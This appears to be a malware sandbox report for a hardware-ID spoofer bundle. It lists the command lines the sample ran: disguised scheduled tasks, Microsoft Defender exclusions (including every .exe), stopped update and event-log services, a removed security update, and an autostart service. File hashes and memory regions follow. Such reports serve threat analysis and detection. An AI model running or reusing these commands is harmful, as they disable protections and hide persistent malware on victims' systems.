C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228769HP-TRGT4560RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728788HP-TRGT3515MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628788HP-TRGT3515FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328788HP-TRGT3515DQ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428788HP-TRGT3515FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528788HP-TRGT3515SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828788HP-TRGT3515SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228788HP-TRGT3515RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28788HP-TRGT3515AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28805HP-TRGT24489AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328805HP-TRGT24489DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728805HP-TRGT24489MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628805HP-TRGT24489FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428805HP-TRGT24489FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528805HP-TRGT24489SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828805HP-TRGT24489SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228805HP-TRGT24489RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: R435-2NI5

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: R435-2NI5

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: LZ67-VM9H

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: LZ67-VM9H

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 51JH-3TN2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 51JH-3TN2

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 6VJR-O4LJ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 6VJR-O4LJ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: SGHT-FSK6

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: SGHT-FSK6

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: U68V-VZ6Z

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: U68V-VZ6Z

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\odt\StartMenuExperienceHost.exe'" /f

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Windows\Temp\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: ILF2-306G

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\Temp\csrss.exe'" /rl HIGHEST /f

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: ILF2-306G

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Temp\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Temp\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\StartMenuExperienceHost.exe'

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: R6RK-9TE5

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YNjaADP11G.bat"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: R6RK-9TE5

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "driverupdate"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: TRTZ-EKBB

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "driverupdate"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: VLO2-GEZD

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: TRTZ-EKBB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: VLO2-GEZD

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 8K70-TJOJ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 8K70-TJOJ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 283C-NVU8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 283C-NVU8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: MPNA-10IL

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: MPNA-10IL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E6G0-1ZPS

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E6G0-1ZPS

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TBJO-MUIH

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TBJO-MUIH

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: DKKV-PKAA

C:\ProgramData\VC_redist.x64.exe

C:\ProgramData\VC_redist.x64.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: DKKV-PKAA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 8F5F-1HKU

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 8F5F-1HKU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: NBN5-B84F

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: NBN5-B84F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: ULLK-RAET

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: ULLK-RAET

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: KTNJ-FEK6

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: KTNJ-FEK6

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: C8PH-64CH

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: C8PH-64CH

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 988A-UHHG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 988A-UHHG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 58L6-A0AP

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 58L6-A0AP

Network

Files

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 6325b6182c988ad8d54e7122a140e6b5
SHA1 4b1f8a319f9b29ab3707814ec329ebf07f2cc7cf
SHA256 c3ffcf8f947ae9766f07dc024a4a8372fc854333d9c561ade4d923f744ba52f8
SHA512 4f2e388a2fc7c52e5408490508d13c8dba290f98559f4ec178fdf220990b33b9c2fb7a159f777beca585694f9b9d6eb71f47ef45da61f4631a7d625c04f614c9

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 64a5d40d76e76be2500f5b1de2c7cc30
SHA1 e9686932695bcd0eaef0bb8d4fc59a52030f90b0
SHA256 aaf32d00721e77dc86fad2711e1680d031e5acd8676128547eee09721f279436
SHA512 1dc930e1a632ba174ad5d71f412c103eb050cd27b088387b71216cd8af72e4868d61f4bdb592c086a1abe258161729d8d48cd93a5f1a52d7ac2c06afdb3eee36

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 fa39a2f1c265a76ad0331010cc675c3d
SHA1 e995206fd85eaacf73eb34e1a0682cc89707e8d7
SHA256 17793e77ef0ea732ca698d043b9c89c81e24ba063a60703c0614a041503b3413
SHA512 c42d1e993ced2d0b2e402a8bcbb45258243f87af13e58f518ed72ada4cf8d1f36062ef55ccd8494838e679e107134618c52c4427344bd8c4823a3a97280daf4c

memory/3684-16-0x0000000000160000-0x0000000000484000-memory.dmp

memory/3684-17-0x00007FF8A6610000-0x00007FF8A70D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 4be192f79e66b6d817de7853d3b93c38
SHA1 18c030dfa65001c6ce8914e09c10aa9e1e1a9a66
SHA256 e01b7f059c4e05671c3589f6685943317b208ffe3e0eecbc139a0ea54564ece3
SHA512 58a4f9085038d416fd7864d91abcc4edbd0b7fba441595358d7b1b6a356685e5bb51ff9da019e8cff6dd673cd0566ef358242d1d3699f8468188367758f3190b

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 b23300557af343583a8ee4513f9a6ec2
SHA1 f5d8ad6525b47a40a76d7a2a58f45eb5d31671db
SHA256 9afa98012a8cfd2d98528432e6c22a9bcfd6600cdeae25fc261527174b60d133
SHA512 74db07c4187e88a0bcfe3fda0fa8779ae264de93435473d8d5376bdbf5fe3284445451d79c74dc9a92583dc23a2c50bbecd998eac5799a9de1e1814df761a6bb

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 4cde2704ba1f70df394d12972a9f0089
SHA1 e7e2edcefefb354a1d42c8bc6089c29168493aaf
SHA256 b8736adf57787251b019a95f431e2c8065a58c8dc946853e61c22b80dfa056cb
SHA512 12a5381096866e3a996000aba09182c074a55afc2d0af6d78e90eb76fbe93f3b211e91d78a72de458429777e4a97830b585a81818c8df23acde0b459d3f45c6c

memory/3512-29-0x0000000000400000-0x0000000001274000-memory.dmp

memory/2452-31-0x0000000074680000-0x0000000074C31000-memory.dmp

memory/3512-32-0x000000007FA70000-0x000000007FE41000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 9f6d01dde54a7635749ccb46ee55b60c
SHA1 ae92ca1a982d1c59271b3ade5842a6db81c7734e
SHA256 b5a6bac604b1109fd932b154b8c1beb35ab94b52c5085f69e3d291484544d8a5
SHA512 40e7927764ecb25fd72eb25fc31441b4ca4196da5493f2c14527b9258aa17072fa986848678e6e67ff7cf353a16d052e1ff7c3f1ed6b0f2cafdb69e39e2f65d4

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 b91fd6835686fcbe424710a3bc7d6875
SHA1 95ba044a0c7ef5e952cca3790aed6631a9c19090
SHA256 60bb8f713c811c53abbea4c8ed5305601c933ed116fe3f5397c8154eb9c9013f
SHA512 ca467234707ee5bff2cea6554a4f74bf95324725b129cdc43358f6bffedd9ea137361cab58c12526af64c3171fc1880aabf15dcf33b1a9d65747319244512fd4

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 3852d8a4224646c2925c7d9b6bbe2b01
SHA1 a7e4ae9295b3bef0cf3a96626b1cd73edab7bfc6
SHA256 debbd838c3c980c25da16aed115b2574f653b30471e4134b25472690c5e518d9
SHA512 2d03e5741e6e283576195de3420f3d879131bedb02e7831116c66427e7a3aeb0e7088b1882340c7ec5a9fe68b5d6b752522ae7e48fff08d7db60329c738ffbf5

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

MD5 e0830c0edad924b513dd42350eae29f3
SHA1 6cc9c7b5ab750cd74674b8b2d81edc967dbabd53
SHA256 4ebc90356f8bcc7222401ea1b56480af5a18f701cc631d5cb04aebba8a3d4531
SHA512 6add31c8fe6e45a99d15620bb382bc633c46343fda92ded36d04475a21ce463ed1aa4f9f637efa179608cc58ab90cb834bd69706501293134826cd96d426e5d4

memory/3428-70-0x00007FF8A6610000-0x00007FF8A70D1000-memory.dmp

memory/3512-69-0x0000000000400000-0x0000000001274000-memory.dmp

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 acec1f9aeeaf540a542c10935731eb5f
SHA1 718d4723e6ca3b6ba683beb9a4518410f03d7aca
SHA256 57c4a0472d32cca25b20f7136075cc23dcbc8c4a17f3a05fd6a487071ceb7a01
SHA512 94b3efd79364b4f4a9bc201c7f78350f7dc2c987585dec9ce16efa6a247dbfc26461657949d195aaf4ab28826432ab72fd6977f4a69d6ea2d75daec504b50b11

memory/624-75-0x000000001BFC0000-0x000000001BFD0000-memory.dmp

memory/3428-76-0x0000000002470000-0x0000000002480000-memory.dmp

memory/3512-73-0x000000007FA70000-0x000000007FE41000-memory.dmp

memory/3684-71-0x00007FF8A6610000-0x00007FF8A70D1000-memory.dmp

memory/4484-88-0x0000000072C50000-0x0000000073400000-memory.dmp

memory/4484-92-0x0000000004F60000-0x0000000005588000-memory.dmp

memory/3428-93-0x00007FF8C58E0000-0x00007FF8C58E1000-memory.dmp

memory/3428-95-0x00007FF8C5A20000-0x00007FF8C5ADE000-memory.dmp

memory/4484-94-0x0000000002830000-0x0000000002840000-memory.dmp

memory/4484-91-0x0000000002830000-0x0000000002840000-memory.dmp

memory/3428-90-0x0000000000DD0000-0x0000000000DDE000-memory.dmp

memory/4484-87-0x0000000002840000-0x0000000002876000-memory.dmp

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

MD5 f0dc17a5ad67849e86039c7247b74da2
SHA1 820d45cdffbee5c0b6754b2b4a75dd7bae2a41a2
SHA256 2adfb48095f51199ff22e7ebf0a1cd8a84b230e330a7c9919a9332b5ef169e11
SHA512 b6bca9800e661b05c348ee5bcd118c7d75c513124b0bc4dfa645a9b1c66bcd1716eebc8616ae09fc0c2863bfb0f0f720d3546ddc02aeefcfc4d69a3e3d138c4c

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

MD5 56d82846e9da7285db15f499dd025d31
SHA1 48c597f6848ed3d9f9c35311e215b14436c8339c
SHA256 1bf087669de8a79ae3bab44a4b62e0ccf21bfa229c9984969a399ab0a04b4ebb
SHA512 95dc3ab8772c0531c8899ea65d5e011bac7189c6876a14e9b77a3f922e1c78273f936bd4fd971c900c0bcf1050f5b0a6a685429cc6844ee3fcb367f6155bd0a1

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 49d30b89b9cdcca91e0e9e04b5d71d27
SHA1 ebf294802e9ba3249eb7b6b972d9a314f7f044f0
SHA256 ab203a4a616e98fe6548bfac0a981032f43d6521b5852d799a025f52919bc542
SHA512 08c6fb9ae277862c76afa5b7e21a95c2760c06d70716eebeeb71515f376c3c2b3303d1cfd78e2672576751c681b97fd1f00c462a3d4987bbd1b45e8114bfcc8c

memory/3428-65-0x00000000003A0000-0x000000000048A000-memory.dmp

memory/624-55-0x00007FF8A6610000-0x00007FF8A70D1000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 2038b9e09e99a9083458fb0eaf4d51a4
SHA1 d6416dcc45990a71d6cfbc0a9c8914784e6f68ac
SHA256 c44c1dbdde6fdb118b26bb67f1db28ee8012d17fc5685a7a0271dcbd96f0e585
SHA512 e69961d0ce3fd4d4d173381dad25f163e238dc00b80b749ce6085631211e86b211af802747f96e71d26d0b28c5eccaaf548481ba79b02ead792ceb7ad15c45a3

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 2988aa0f63cdebfb1cd4a9a24e60474f
SHA1 9942f673deb1dcb116a42bf7be1bb2e0cec412e5
SHA256 cb5c25a40ea40d180662919f99dd57f34c2a8a43900bd181f252c4acaeb8201b
SHA512 8ac470b38031cd8d52ce7eb37152987a6b1ba09d692846cf84b754dfff1b22615e9eca141c1d0b98ce8d7b56d877e0d6c16f85213c082a62c835f89311576199

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 da84ba44a6138800c1ec16593b28889b
SHA1 17abb91c89d569c126a42e80b11cf9c366571377
SHA256 9b2137fed933d63a09fbdd2d4a678b0b72162a19d902f5183dadc69a65201293
SHA512 8d83b2de79ee5f1ce320c389d07d0a92f22dee9a56f8619ae0e71b50d0d4be9b9e6a29cadd3dd243e224c796d2aa06792a04d4b6e4b96c219c3e0d13c45d4c06

memory/3428-98-0x00007FF8C58D0000-0x00007FF8C58D1000-memory.dmp

memory/3428-97-0x0000000002420000-0x000000000243C000-memory.dmp

memory/3428-101-0x0000000002440000-0x0000000002458000-memory.dmp
